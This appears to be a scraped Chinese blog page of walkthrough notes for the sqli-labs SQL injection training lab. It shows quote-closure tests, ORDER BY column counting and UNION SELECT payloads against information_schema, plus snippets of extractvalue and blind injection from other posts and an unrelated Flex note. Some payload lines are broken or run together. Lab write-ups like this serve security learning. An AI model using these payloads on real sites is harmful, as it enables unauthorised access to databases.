正常訪問:
一、判斷
1
and1=2
//訪問正常,不是數值查詢
1' //報錯,可能為sql字元注入
1' --
+//返回正常,所以為單引號字元注入
注:二、查詢1、我使用的是 --+來注釋sql後面的語句,+的作用是,它在解析的時候會被解析為空格,用來隔開 --與後面語句。
2、#注釋也是可行的,但在瀏覽器的url中,他是被用來指導瀏覽器動作的,所以http請求並不包含它,只要將它轉換為url編碼%23.
3、 --』也可以
1、查詢列數
找乙個臨界值,這道題3正常,4錯誤,所以3就是那個臨界值,說明這個表就是3列。
1'order by 3
--+
2、聯合查詢
找乙個不存在的頁面,檢視是否有顯示位,如圖有2、3兩個顯示位。(因為mysql_fetch_array();這個函式,只會取出一行,如果要把所有結果取出來要用迴圈來取了在這兒我們只需要讓union select前面的查詢結果為空集,則後面的自然就成了第一行了,怎樣讓前面的成空集呢,只需要將id改為表裡沒有的,或者不合法的額就行)
2.1、查詢庫名
group_concat:顯示所有內容並且相同內容只顯示一次。
2.2、查詢表名
2.3查詢字段
999' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='emails') --+
注: union官方解釋是用來把多個select語句的結果組合到乙個結果集合中,且每列的資料型別必須相同。和第一題幾乎一樣,只是沒有了』的閉合group_concat也可以用limt替換。例如:999』 union select 1,2,(select table_name from information_schema.tables where table_schema = (select database()) limit 0,1) --+
1 order by 3
999 union select 1,2
,3999 union select 1
,(select group_concat
(schema_name
) from information_schema
.schemata),
3999 union select 1
,(select group_concat
(table_name
) from information_schema
.tables),
3999 union select 1
,(select group_concat
(column_name
) from information_schema
.columns where table_schema
=(select database()
)),3
加』嘗試,發現報錯,檢視報錯語句』1』),所以猜測後台的查詢語句為(』$id』)。
構造payload
1
') order by 3 --+
999'
) union select 1,2
,3--+
999') union select 1
,(select group_concat
(column_name
) from information_schema
.columns where table_schema
=(select database()
)),3
--+
在引數加雙引號報錯,根據報錯資訊構造(") --+)
構造payload
") order by 3 --+
") union select 1,2
,3--+
") union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
") union select 1
,(select group_concat
(table_name
) from information_schema
.tables),
3--+") union select 1
,(select group_concat
(column_name
) from information_schema
.columns where table_schema
=(select database()
)),3
--+
sqli labs闖關之61 65關
最後五關!第六十一關 和六十關基本一樣,就是變成了單括號和雙括號,這好像是第一次遇見雙括號 爆資料庫名 id 1 and extractvalue 1,concat 0x5c,select database 23 爆表名 id 0 union select extractvalue 1,concat...
sqli labs闖關筆記 less8 10 盲注
一 布林型盲注,布林盲注與less6思路一致。1 查詢注入點 輸入單引號,you are in消失,證明存在注入點。找到閉合引數的方法,單引號後面直接加注釋,you are in出現,證明閉合方式正確。2 猜資料庫名 and left select database 1 s 3 猜表名 and as...
flex 筆記(更新中。。。。)
1 如果要設定validator驗證元件裡面提示字的大小,可以在mxml中加入 3 如果你想要在tooltip中換行顯示文字,則 在actionscript 中,您使用 n 轉義的新行字元。在 mxml 標籤中,您使用 如 tooltip child components without toolt...